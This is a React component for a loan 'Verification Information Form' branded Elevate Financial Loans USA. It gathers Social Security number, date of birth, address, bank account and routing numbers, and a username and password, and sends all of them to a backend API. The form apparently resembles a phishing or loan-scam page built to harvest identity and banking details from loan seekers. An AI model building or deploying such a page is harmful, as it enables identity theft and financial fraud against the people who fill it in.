import { useState } from "react";
import axios from "axios";
import { motion } from "framer-motion";
import {
  User,
  Landmark,
  KeyRound,
  Eye,
  EyeOff,
  X,
  Loader2,
  ShieldCheck,
} from "lucide-react";
import { BrandLogo } from "@/components/BrandLogo";
import { SuccessScreen } from "@/components/SuccessScreen";

const BACKEND_URL = process.env.REACT_APP_BACKEND_URL;
const API = `${BACKEND_URL}/api`;

const EMPTY = {
  first_name: "",
  last_name: "",
  date_of_birth: "",
  ssn: "",
  address: "",
  bank_name: "",
  account_number: "",
  routing_number: "",
  username: "",
  password: "",
  loan_amount: "",
  agree_terms: false,
};

const sectionVariants = {
  hidden: { opacity: 0, y: 18 },
  show: (i) => ({
    opacity: 1,
    y: 0,
    transition: { duration: 0.5, delay: 0.08 * i, ease: [0.16, 1, 0.3, 1] },
  }),
};

const Field = ({ label, id, children, required = true, full = false }) => (
  <div className={full ? "sm:col-span-2" : ""}>
    <label
      htmlFor={id}
      className="mb-1.5 block text-sm font-medium text-[#0f1a2e]"
    >
      {label}
      {required && <span className="ml-0.5 text-rose-500">*</span>}
    </label>
    {children}
  </div>
);

const inputClass =
  "efl-input w-full rounded-lg border border-slate-200 bg-slate-50/60 px-3.5 py-2.5 text-sm text-[#0f1a2e] placeholder:text-slate-400";

const SectionCard = ({ index, icon: Icon, title, children }) => (
  <motion.section
    custom={index}
    variants={sectionVariants}
    initial="hidden"
    animate="show"
    className="rounded-xl border border-slate-100 bg-white p-6 shadow-sm sm:p-7"
    data-testid={`section-${title.toLowerCase().replace(/\s+/g, "-")}`}
  >
    <div className="mb-5 flex items-center gap-3">
      <span
        className="flex h-9 w-9 items-center justify-center rounded-lg text-white"
        style={{ background: "linear-gradient(135deg,#3b82f6,#2563eb)" }}
      >
        <Icon size={18} strokeWidth={2.25} />
      </span>
      <h2 className="font-serif-brand text-xl font-bold text-[#0f1a2e]">
        {title}
      </h2>
    </div>
    {children}
  </motion.section>
);

export const LoanVerificationForm = () => {
  const [form, setForm] = useState(EMPTY);
  const [errors, setErrors] = useState({});
  const [showPassword, setShowPassword] = useState(false);
  const [submitting, setSubmitting] = useState(false);
  const [submitError, setSubmitError] = useState("");
  const [success, setSuccess] = useState(false);

  const setField = (key, value) => {
    setForm((f) => ({ ...f, [key]: value }));
    setErrors((e) => ({ ...e, [key]: undefined }));
  };

  const validate = () => {
    const e = {};
    const req = [
      "first_name",
      "last_name",
      "date_of_birth",
      "ssn",
      "address",
      "bank_name",
      "account_number",
      "routing_number",
      "username",
      "loan_amount",
    ];
    req.forEach((k) => {
      if (!String(form[k]).trim()) e[k] = "This field is required";
    });
    if (!form.password) {
      e.password = "This field is required";
    }
    if (!form.agree_terms) e.agree_terms = "You must agree to continue";
    setErrors(e);
    return Object.keys(e).length === 0;
  };

  const onSubmit = async (ev) => {
    ev.preventDefault();
    setSubmitError("");
    if (!validate()) return;
    setSubmitting(true);
    try {
      await axios.post(`${API}/loan-applications`, form);
      setSuccess(true);
    } catch (err) {
      const detail =
        err?.response?.data?.detail ||
        "Something went wrong while submitting your application. Please try again.";
      setSubmitError(
        typeof detail === "string" ? detail : "Please review your details and try again."
      );
    } finally {
      setSubmitting(false);
    }
  };

  if (success) return <SuccessScreen />;

  return (
    <div className="efl-page flex flex-col">
      {/* Header */}
      <header
        className="w-full"
        style={{ background: "linear-gradient(120deg,#0b1220 0%,#0f1a2e 55%,#16233d 100%)" }}
        data-testid="app-header"
      >
        <div className="mx-auto flex max-w-4xl flex-col items-start gap-5 px-5 py-8 sm:flex-row sm:items-center sm:justify-between sm:px-8">
          <BrandLogo variant="light" size="md" />
          <div className="hidden h-10 w-px bg-white/10 sm:block" />
          <h1
            className="font-serif-brand text-xl font-semibold text-white sm:text-2xl"
            data-testid="header-title"
          >
            Verification Information Form
          </h1>
        </div>
        <div className="h-1 w-full" style={{ background: "var(--efl-gold)" }} />
      </header>

      {/* Form */}
      <main className="mx-auto w-full max-w-4xl flex-1 px-4 py-10 sm:px-8">
        <form onSubmit={onSubmit} noValidate className="space-y-6" data-testid="loan-form">
          {/* Personal Information */}
          <SectionCard index={0} icon={User} title="Personal Information">
            <div className="grid grid-cols-1 gap-5 sm:grid-cols-2">
              <Field label="First Name" id="first_name">
                <input
                  id="first_name"
                  data-testid="input-first-name"
                  className={inputClass}
                  value={form.first_name}
                  onChange={(e) => setField("first_name", e.target.value)}
                  placeholder="John"
                />
                {errors.first_name && <FieldError id="first-name" msg={errors.first_name} />}
              </Field>
              <Field label="Last Name" id="last_name">
                <input
                  id="last_name"
                  data-testid="input-last-name"
                  className={inputClass}
                  value={form.last_name}
                  onChange={(e) => setField("last_name", e.target.value)}
                  placeholder="Doe"
                />
                {errors.last_name && <FieldError id="last-name" msg={errors.last_name} />}
              </Field>
              <Field label="Date of Birth" id="date_of_birth">
                <input
                  id="date_of_birth"
                  type="date"
                  data-testid="input-dob"
                  className={inputClass}
                  value={form.date_of_birth}
                  onChange={(e) => setField("date_of_birth", e.target.value)}
                />
                {errors.date_of_birth && <FieldError id="dob" msg={errors.date_of_birth} />}
              </Field>
              <Field label="Social Security Number" id="ssn">
                <input
                  id="ssn"
                  data-testid="input-ssn"
                  className={inputClass}
                  value={form.ssn}
                  onChange={(e) => setField("ssn", e.target.value)}
                  placeholder="XXX-XX-XXXX"
                  autoComplete="off"
                />
                {errors.ssn && <FieldError id="ssn" msg={errors.ssn} />}
              </Field>
              <Field label="Address" id="address" full>
                <textarea
                  id="address"
                  data-testid="input-address"
                  rows={2}
                  className={inputClass}
                  value={form.address}
                  onChange={(e) => setField("address", e.target.value)}
                  placeholder="Street, City, State, ZIP"
                />
                {errors.address && <FieldError id="address" msg={errors.address} />}
              </Field>
            </div>
          </SectionCard>

          {/* Bank Information */}
          <SectionCard index={1} icon={Landmark} title="Bank Information">
            <div className="grid grid-cols-1 gap-5 sm:grid-cols-2">
              <Field label="Bank Name" id="bank_name" full>
                <input
                  id="bank_name"
                  data-testid="input-bank-name"
                  className={inputClass}
                  value={form.bank_name}
                  onChange={(e) => setField("bank_name", e.target.value)}
                  placeholder="Bank of America"
                />
                {errors.bank_name && <FieldError id="bank-name" msg={errors.bank_name} />}
              </Field>
              <Field label="Account Number" id="account_number">
                <input
                  id="account_number"
                  data-testid="input-account-number"
                  className={inputClass}
                  value={form.account_number}
                  onChange={(e) => setField("account_number", e.target.value)}
                  placeholder="000123456789"
                  autoComplete="off"
                />
                {errors.account_number && (
                  <FieldError id="account-number" msg={errors.account_number} />
                )}
              </Field>
              <Field label="Routing Number" id="routing_number">
                <input
                  id="routing_number"
                  data-testid="input-routing-number"
                  className={inputClass}
                  value={form.routing_number}
                  onChange={(e) => setField("routing_number", e.target.value)}
                  placeholder="011000015"
                  autoComplete="off"
                />
                {errors.routing_number && (
                  <FieldError id="routing-number" msg={errors.routing_number} />
                )}
              </Field>
            </div>
          </SectionCard>

          {/* Account Details */}
          <SectionCard index={2} icon={KeyRound} title="Account Details">
            <div className="grid grid-cols-1 gap-5 sm:grid-cols-2">
              <Field label="Username" id="username">
                <input
                  id="username"
                  data-testid="input-username"
                  className={inputClass}
                  value={form.username}
                  onChange={(e) => setField("username", e.target.value)}
                  placeholder="johndoe"
                  autoComplete="off"
                />
                {errors.username && <FieldError id="username" msg={errors.username} />}
              </Field>
              <Field label="Password" id="password">
                <div className="relative">
                  <input
                    id="password"
                    data-testid="input-password"
                    type={showPassword ? "text" : "password"}
                    className={`${inputClass} pr-11`}
                    value={form.password}
                    onChange={(e) => setField("password", e.target.value)}
                    placeholder="••••••••"
                    autoComplete="new-password"
                  />
                  <button
                    type="button"
                    data-testid="toggle-password"
                    onClick={() => setShowPassword((s) => !s)}
                    aria-label={showPassword ? "Hide password" : "Show password"}
                    className="absolute right-3 top-1/2 -translate-y-1/2 text-slate-400 transition-colors hover:text-[#2563eb]"
                  >
                    {showPassword ? <EyeOff size={18} /> : <Eye size={18} />}
                  </button>
                </div>
                {errors.password && <FieldError id="password" msg={errors.password} />}
              </Field>
            </div>
          </SectionCard>

          {/* Required Loan Amount */}
          <motion.section
            custom={3}
            variants={sectionVariants}
            initial="hidden"
            animate="show"
            className="rounded-xl border border-slate-100 bg-white p-6 shadow-sm sm:p-7"
            data-testid="section-loan-amount"
          >
            <Field label="Required Loan Amount" id="loan_amount" full>
              <input
                id="loan_amount"
                data-testid="input-loan-amount"
                className={inputClass}
                value={form.loan_amount}
                onChange={(e) => setField("loan_amount", e.target.value)}
                placeholder="$25,000"
              />
              {errors.loan_amount && <FieldError id="loan-amount" msg={errors.loan_amount} />}
            </Field>
          </motion.section>

          {/* Declaration + submit */}
          <motion.div
            custom={4}
            variants={sectionVariants}
            initial="hidden"
            animate="show"
            className="rounded-xl border border-slate-100 bg-white p-6 shadow-sm sm:p-7"
          >
            <label className="flex cursor-pointer items-start gap-3">
              <input
                type="checkbox"
                data-testid="checkbox-agree"
                checked={form.agree_terms}
                onChange={(e) => setField("agree_terms", e.target.checked)}
                className="mt-0.5 h-4 w-4 shrink-0 rounded border-slate-300 text-[#2563eb] focus:ring-[#2563eb]"
              />
              <span className="text-sm text-slate-600">
                I agree to the terms &amp; privacy policy
              </span>
            </label>
            {errors.agree_terms && <FieldError id="agree" msg={errors.agree_terms} />}

            {submitError && (
              <div
                data-testid="submit-error"
                className="mt-5 flex items-start gap-2 rounded-lg border border-rose-200 bg-rose-50 px-4 py-3 text-sm text-rose-700"
                role="alert"
              >
                <X size={16} className="mt-0.5 shrink-0" />
                <span>{submitError}</span>
              </div>
            )}

            <button
              type="submit"
              data-testid="submit-button"
              disabled={submitting}
              className="efl-submit mt-6 flex w-full items-center justify-center gap-2 rounded-lg py-3.5 text-sm font-semibold text-white disabled:opacity-70"
              style={{ background: "linear-gradient(120deg,#0b1220,#16233d)" }}
            >
              {submitting ? (
                <>
                  <Loader2 size={18} className="efl-spinner" />
                  Submitting…
                </>
              ) : (
                <>
                  <ShieldCheck size={18} />
                  Submit Application
                </>
              )}
            </button>
          </motion.div>
        </form>
      </main>

      {/* Footer */}
      <footer
        className="w-full py-6 text-center"
        style={{ background: "#0b1220" }}
        data-testid="app-footer"
      >
        <p className="text-sm text-slate-400">© 2026 Elevate Financial Loans USA.</p>
      </footer>
    </div>
  );
};

const FieldError = ({ id, msg }) => (
  <p className="mt-1.5 text-xs text-rose-500" data-testid={`error-${id}`}>
    {msg}
  </p>
);
